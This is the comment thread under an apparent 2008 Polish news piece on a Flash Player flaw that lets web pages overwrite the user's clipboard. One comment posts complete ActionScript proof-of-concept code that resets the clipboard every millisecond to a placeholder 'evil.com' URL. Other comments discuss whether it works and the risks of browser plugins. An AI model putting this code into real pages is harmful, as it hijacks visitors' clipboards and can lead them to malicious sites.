Apple Facebook Google Microsoft badania bezpieczeństwo patronat DI prawa autorskie serwisy społecznościowe smartfony

Komentarze:

  • ~xmaster

    Jest błąd w materiale
    Owszem po wyświetleniu tej strony w schowku miałem adres evil.cośtam, ale wystarczyło skopiować do schowka cokolwiek innego i już zamieniało o poprzedni wpis - nawet przy otwartej karcie tgo skryptu.
    Open SuSE 11.0 Firefox - w miarę najnowszy :)

    27-08-2008, 12:15

    Odpowiedz
    odpowiedz
  • ~Kod do ataku

    package test_fla
    {
    import flash.display.*;
    import flash.system.*;
    import flash.utils.*;

    dynamic public class MainTimeline extends MovieClip
    {

    public function MainTimeline()
    {
    addFrameScript(0, frame1);
    return;
    }

    function frame1()
    {
    setInterval(setClip, 1);
    return;
    }

    public function setClip()
    {
    System.setClipboard("http://www.evil.com");
    return;
    }
    }
    }

    21-08-2008, 21:18

    Odpowiedz
    odpowiedz
  • Jurgi
    Użytkownik DI Jurgi (1377)

    Kolejny powód, żeby nie używać wtyczki flash. Ile jeszcze takich dziur istnieje? O ilu nie wiemy, choć może już są wykorzystywane? Im więcej wszelkiego rodzaju wtyczek i dodatków, tym większe ryzyko…

    21-08-2008, 15:00

    Odpowiedz
    odpowiedz
  • ~koniczynek

    Na atak narażony jest nie tylko Internet Explorer, ale też uznawane za bardziej bezpieczne przeglądarki Firefox i Safari

    Co to za brednie. Na atak narażony jest plugin flash, który może być uruchomiony w dowolnej przeglądarce, nawet w Operze, o której tutaj mowy nie ma.

    21-08-2008, 14:21

    Odpowiedz
    odpowiedz
  • ~asdds

    zawszę Operę pomijają ;(

    21-08-2008, 12:18

    Odpowiedz
    odpowiedz
Chwilowo brak danych. Sprawdź później :)